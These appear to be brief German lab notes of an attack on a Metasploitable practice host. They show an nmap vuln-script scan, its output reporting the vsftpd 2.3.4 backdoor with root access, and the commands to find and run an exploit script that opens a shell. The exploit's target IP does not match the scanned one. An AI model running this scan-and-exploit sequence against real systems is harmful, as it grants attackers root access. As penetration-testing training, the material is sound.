Angreifer
Scan
- nmap -sV --script vuln 10.0.10.105 -p 21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST
Nmap scan report for metaspoitable.hack.lab (10.0.10.105)
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| https://www.securityfocus.com/bid/48539
|_ http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
MAC Address: 0C:67:68:58:00:00 (Unknown)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
Nach Exploit googlen
- vsftpd 2.3 4 exploit-db
Exploit finden
Exploit ausführen
- python vsftp.py 10.80.100.105
Success, shell opened
Send `exit` to quit shell